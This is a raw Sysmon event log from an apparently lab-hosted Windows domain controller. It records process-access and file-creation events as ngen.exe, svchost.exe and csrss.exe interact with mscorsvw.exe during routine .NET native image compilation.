10341000x80000000000000007787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:58.260{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9206-6005-7203-00000000A301}1184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:58.197{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9206-6005-7103-00000000A301}4608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:58.182{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9206-6005-7103-00000000A301}4608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:58.182{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9206-6005-7103-00000000A301}4608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:58.041{59A5CD1D-9204-6005-7003-00000000A301}2504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\9c8-0\Microsoft.Build.Tasks.v4.0.dll2021-01-18 13:49:58.041 10341000x80000000000000007808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:59.854{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9207-6005-7803-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:59.854{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9207-6005-7803-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:59.854{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9207-6005-7803-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:59.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9207-6005-7703-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:59.682{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9207-6005-7703-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:59.682{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9207-6005-7703-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:59.651{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9207-6005-7603-00000000A301}648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:59.635{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9207-6005-7603-00000000A301}648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:59.635{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9207-6005-7603-00000000A301}648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:00.979{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9208-6005-7B03-00000000A301}1188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:00.979{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9208-6005-7B03-00000000A301}1188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:00.885{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9208-6005-7A03-00000000A301}3800C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:00.869{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9208-6005-7A03-00000000A301}3800C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:00.869{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9208-6005-7A03-00000000A301}3800C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:00.822{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9208-6005-7903-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:00.807{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9208-6005-7903-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:00.807{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9208-6005-7903-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:00.713{59A5CD1D-9207-6005-7803-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b04-0\Microsoft.CSharp.dll2021-01-18 13:50:00.713 10341000x80000000000000007830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:01.479{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9209-6005-7E03-00000000A301}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 